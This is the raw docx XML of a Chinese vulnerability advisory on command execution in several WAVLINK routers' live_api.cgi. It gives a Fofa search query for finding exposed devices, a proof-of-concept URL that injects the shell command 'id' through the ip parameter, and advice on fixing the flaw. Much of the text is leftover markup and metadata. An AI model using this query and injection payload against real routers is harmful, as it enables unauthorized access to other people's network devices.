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WAVLINK 多款路由器 live_api.cgi 存在命令执行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漏洞描述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WAVLINK wavlink是中国睿因科技（WAVLINK）公司的一款路由器。连接两个或多个网络的硬件设备，在网络间起网关的作用。WAVLINK 多款路由器 live_api.cgi 存在命令执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，攻击者可通过此漏洞获取权限。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。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漏洞复现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Fofa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body="firstFlage"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75580" cy="2294255"/>
            <wp:effectExtent l="0" t="0" r="12700" b="6985"/>
            <wp:docPr id="4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5580" cy="22942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2、界面如下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420995" cy="2489835"/>
            <wp:effectExtent l="0" t="0" r="444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2489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3、隐患url，验证如下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 xml:space="preserve">/cgi-bin/live_api.cgi?page=abc&amp;id=173&amp;ip=;id; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr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72405" cy="1624965"/>
            <wp:effectExtent l="0" t="0" r="63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2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修复建议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1、官方已修复该漏洞，请用户联系厂商修复漏洞：https://www.wavlink.com/en_us/index.html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2、如非必要，禁止公网访问该系统。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3、设置白名单访问。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1CE124"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0D1CE124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GVlNmU0MDY3ZjU0MTgxOGRiNjg4OTc5NWFkNGI1NmUifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00000000"/>
    <w:rsid w:val="074778FA"/>
    <w:rsid w:val="0A3B069E"/>
    <w:rsid w:val="19630A84"/>
    <w:rsid w:val="1C216C23"/>
    <w:rsid w:val="22DA69BF"/>
    <w:rsid w:val="34AD4791"/>
    <w:rsid w:val="39CA37A1"/>
    <w:rsid w:val="45A56BF4"/>
    <w:rsid w:val="4B866EA2"/>
    <w:rsid w:val="4FB852CB"/>
    <w:rsid w:val="50667CEE"/>
    <w:rsid w:val="50717A33"/>
    <w:rsid w:val="53234EE2"/>
    <w:rsid w:val="5B174C4F"/>
    <w:rsid w:val="62D41977"/>
    <w:rsid w:val="6B297673"/>
    <w:rsid w:val="6DAD38F1"/>
    <w:rsid w:val="7B211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2023-12-20T03:05:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-22T02:00:11Z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F809960957974BA2AF4DC54E9C5F349A_12</vt:lpwstr>
  </property>
</Properties>
</file>